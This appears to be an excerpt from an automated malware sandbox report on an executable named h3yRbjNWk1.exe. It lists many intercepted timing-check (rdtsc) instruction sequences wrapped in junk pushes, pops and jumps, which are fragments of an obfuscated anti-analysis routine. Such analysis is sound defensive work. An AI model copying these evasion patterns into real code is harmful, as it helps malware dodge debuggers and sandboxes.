Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CB01E8 second address: 4CB02C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F97B4EC49C7h 0x00000011 sbb eax, 14F3142Eh 0x00000017 jmp 00007F97B4EC49C9h 0x0000001c popfd 0x0000001d call 00007F97B4EC49C0h 0x00000022 jmp 00007F97B4EC49C2h 0x00000027 pop ecx 0x00000028 popad 0x00000029 xchg eax, ebp 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007F97B4EC49C7h 0x00000031 add esi, 5AF79F9Eh 0x00000037 jmp 00007F97B4EC49C9h 0x0000003c popfd 0x0000003d pushfd 0x0000003e jmp 00007F97B4EC49C0h 0x00000043 sub ax, 8998h 0x00000048 jmp 00007F97B4EC49BBh 0x0000004d popfd 0x0000004e popad 0x0000004f mov ebp, esp 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 mov ebx, 37548086h 0x00000059 mov esi, edx 0x0000005b popad 0x0000005c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CA0040 second address: 4CA00A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, BC8Eh 0x00000007 jmp 00007F97B4F2EDCFh 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 jmp 00007F97B4F2EDD9h 0x00000015 xchg eax, ebp 0x00000016 jmp 00007F97B4F2EDCEh 0x0000001b mov ebp, esp 0x0000001d jmp 00007F97B4F2EDD0h 0x00000022 pop ebp 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 mov dx, ED80h 0x0000002a mov ebx, 4DB761ACh 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CA00A2 second address: 4CA00B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F97B4EC49C1h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CE0006 second address: 4CE002B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov ebx, eax 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F97B4F2EDD6h 0x0000000e push eax 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 mov esi, edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CE002B second address: 4CE0050 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov ecx, edx 0x00000008 popad 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F97B4EC49BBh 0x0000000f mov ebp, esp 0x00000011 pushad 0x00000012 mov edi, 19536476h 0x00000017 popad 0x00000018 pop ebp 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CE0050 second address: 4CE0054 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CE0054 second address: 4CE005A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CE005A second address: 4CE0060 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CE0060 second address: 4CE0064 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CE0064 second address: 4CE0068 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C7011F second address: 4C70123 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C70123 second address: 4C70129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C90C56 second address: 4C90C5C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C90C5C second address: 4C90C60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C90C60 second address: 4C90C64 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C90C64 second address: 4C90CBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F97B4F2EDD0h 0x00000010 sbb al, FFFFFF98h 0x00000013 jmp 00007F97B4F2EDCBh 0x00000018 popfd 0x00000019 popad 0x0000001a push eax 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F97B4F2EDCEh 0x00000024 add ecx, 6B225DF8h 0x0000002a jmp 00007F97B4F2EDCBh 0x0000002f popfd 0x00000030 mov ecx, 76D2772Fh 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C90CBA second address: 4C90CBF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C90835 second address: 4C9086B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushfd 0x0000000e jmp 00007F97B4F2EDCAh 0x00000013 xor esi, 0D5AD2A8h 0x00000019 jmp 00007F97B4F2EDCBh 0x0000001e popfd 0x0000001f rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C906FD second address: 4C9077D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, E5F4h 0x00000007 mov si, bx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e jmp 00007F97B4EC49BFh 0x00000013 mov ebp, esp 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F97B4EC49C4h 0x0000001c or si, A2D8h 0x00000021 jmp 00007F97B4EC49BBh 0x00000026 popfd 0x00000027 call 00007F97B4EC49C8h 0x0000002c mov di, si 0x0000002f pop ecx 0x00000030 popad 0x00000031 pop ebp 0x00000032 pushad 0x00000033 mov ax, dx 0x00000036 push eax 0x00000037 push edx 0x00000038 call 00007F97B4EC49C5h 0x0000003d pop esi 0x0000003e rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C90430 second address: 4C9045C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 5261022Ah 0x00000008 mov ebx, 07E516F6h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007F97B4F2EDD5h 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C9045C second address: 4C90462 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C90462 second address: 4C90466 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C90466 second address: 4C9046A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CA03BE second address: 4CA03E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDD9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CA03E3 second address: 4CA03E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CA03E7 second address: 4CA03ED instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CA03ED second address: 4CA042C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F97B4EC49C0h 0x00000009 sub si, B008h 0x0000000e jmp 00007F97B4EC49BBh 0x00000013 popfd 0x00000014 mov dx, si 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a pop ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F97B4EC49C1h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CA042C second address: 4CA0432 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CD0F2F second address: 4CD0F66 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, bx 0x00000006 mov eax, ebx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebp 0x0000000c jmp 00007F97B4EC49C2h 0x00000011 mov dword ptr [esp], ebp 0x00000014 pushad 0x00000015 mov ebx, esi 0x00000017 mov ax, 6E59h 0x0000001b popad 0x0000001c mov ebp, esp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov ax, dx 0x00000024 mov edx, 1F3133D0h 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CD0F66 second address: 4CD0F6D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, D6h 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CD0F6D second address: 4CD0F7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pop ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CD0F7B second address: 4CD0F7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CD0F7F second address: 4CD0F85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CB058B second address: 4CB0591 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CB0591 second address: 4CB05BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov ebx, esi 0x0000000c jmp 00007F97B4EC49BCh 0x00000011 popad 0x00000012 xchg eax, ebp 0x00000013 pushad 0x00000014 mov eax, 067B31ADh 0x00000019 call 00007F97B4EC49BAh 0x0000001e push eax 0x0000001f push edx 0x00000020 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CB05BD second address: 4CB05F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 popad 0x00000006 mov ebp, esp 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F97B4F2EDD8h 0x00000011 or cx, 9AA8h 0x00000016 jmp 00007F97B4F2EDCBh 0x0000001b popfd 0x0000001c mov edx, eax 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CB05F5 second address: 4CB0642 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d jmp 00007F97B4EC49BCh 0x00000012 push eax 0x00000013 push edx 0x00000014 pushfd 0x00000015 jmp 00007F97B4EC49C0h 0x0000001a add ax, 2F68h 0x0000001f jmp 00007F97B4EC49BBh 0x00000024 popfd 0x00000025 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CB0642 second address: 4CB06B3 instructions: 0x00000000 rdtsc 0x00000002 mov bx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 and dword ptr [eax], 00000000h 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F97B4F2EDD0h 0x00000012 add cl, FFFFFFC8h 0x00000015 jmp 00007F97B4F2EDCBh 0x0000001a popfd 0x0000001b pushfd 0x0000001c jmp 00007F97B4F2EDD8h 0x00000021 sbb cx, 8428h 0x00000026 jmp 00007F97B4F2EDCBh 0x0000002b popfd 0x0000002c popad 0x0000002d and dword ptr [eax+04h], 00000000h 0x00000031 pushad 0x00000032 mov bl, ah 0x00000034 call 00007F97B4F2EDD1h 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C9063A second address: 4C90661 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49BBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F97B4EC49C5h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C90661 second address: 4C906A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F97B4F2EDCEh 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F97B4F2EDD7h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C906A0 second address: 4C906A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CB00CA second address: 4CB00D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CB00D0 second address: 4CB0106 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, eax 0x00000005 jmp 00007F97B4EC49C6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e jmp 00007F97B4EC49C0h 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CB0106 second address: 4CB010A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CB010A second address: 4CB0126 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CB0126 second address: 4CB0130 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 241E1384h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CB0130 second address: 4CB016F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 xchg eax, ebp 0x00000008 jmp 00007F97B4EC49C9h 0x0000000d mov ebp, esp 0x0000000f pushad 0x00000010 mov eax, 3EAC7813h 0x00000015 mov ax, 826Fh 0x00000019 popad 0x0000001a pop ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F97B4EC49BCh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CB016F second address: 4CB017E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CD0735 second address: 4CD073B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CD073B second address: 4CD0798 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a jmp 00007F97B4F2EDCFh 0x0000000f movzx eax, bx 0x00000012 popad 0x00000013 mov ebp, esp 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F97B4F2EDD1h 0x0000001c jmp 00007F97B4F2EDCBh 0x00000021 popfd 0x00000022 push ecx 0x00000023 pushad 0x00000024 popad 0x00000025 pop edi 0x00000026 popad 0x00000027 xchg eax, ecx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F97B4F2EDD7h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CD0798 second address: 4CD0836 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F97B4EC49BFh 0x00000009 add ax, 129Eh 0x0000000e jmp 00007F97B4EC49C9h 0x00000013 popfd 0x00000014 pushfd 0x00000015 jmp 00007F97B4EC49C0h 0x0000001a and ch, FFFFFF98h 0x0000001d jmp 00007F97B4EC49BBh 0x00000022 popfd 0x00000023 popad 0x00000024 pop edx 0x00000025 pop eax 0x00000026 push eax 0x00000027 pushad 0x00000028 push edx 0x00000029 jmp 00007F97B4EC49C2h 0x0000002e pop ecx 0x0000002f pushfd 0x00000030 jmp 00007F97B4EC49BBh 0x00000035 add si, 0A0Eh 0x0000003a jmp 00007F97B4EC49C9h 0x0000003f popfd 0x00000040 popad 0x00000041 xchg eax, ecx 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CD0836 second address: 4CD083A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CD083A second address: 4CD0840 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CD0840 second address: 4CD0846 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CD0846 second address: 4CD0891 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [76FB65FCh] 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F97B4EC49C6h 0x00000014 jmp 00007F97B4EC49C5h 0x00000019 popfd 0x0000001a mov ch, DEh 0x0000001c popad 0x0000001d test eax, eax 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov ebx, ecx 0x00000024 mov ecx, 11692BC7h 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CD0891 second address: 4CD0897 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CD0897 second address: 4CD08E3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49BFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F9827127A70h 0x00000011 jmp 00007F97B4EC49C6h 0x00000016 mov ecx, eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F97B4EC49C7h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CD08E3 second address: 4CD08F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, ax 0x00000006 mov edi, ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor eax, dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CD08F7 second address: 4CD090B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CD09C1 second address: 4CD09C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CD09C6 second address: 4CD09EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49C5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F97B4EC49BDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CD09EF second address: 4CD0A1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4F2EDD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F97B4F2EDD1h 0x0000000f xchg eax, ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CD0A1D second address: 4CD0A21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CD0A21 second address: 4CD0A25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CD0A25 second address: 4CD0A2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4CD0A2B second address: 4CD0A31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C80022 second address: 4C800A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F97B4EC49C1h 0x0000000f xchg eax, ebp 0x00000010 jmp 00007F97B4EC49BEh 0x00000015 mov ebp, esp 0x00000017 pushad 0x00000018 mov cl, 73h 0x0000001a pushfd 0x0000001b jmp 00007F97B4EC49C3h 0x00000020 add cx, 898Eh 0x00000025 jmp 00007F97B4EC49C9h 0x0000002a popfd 0x0000002b popad 0x0000002c and esp, FFFFFFF8h 0x0000002f jmp 00007F97B4EC49BEh 0x00000034 xchg eax, ecx 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C800A9 second address: 4C800AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C800AD second address: 4C800CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F97B4EC49C9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C800CA second address: 4C800E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, ebx 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F97B4F2EDCBh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\h3yRbjNWk1.exe RDTSC instruction interceptor: First address: 4C800E0 second address: 4C800E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
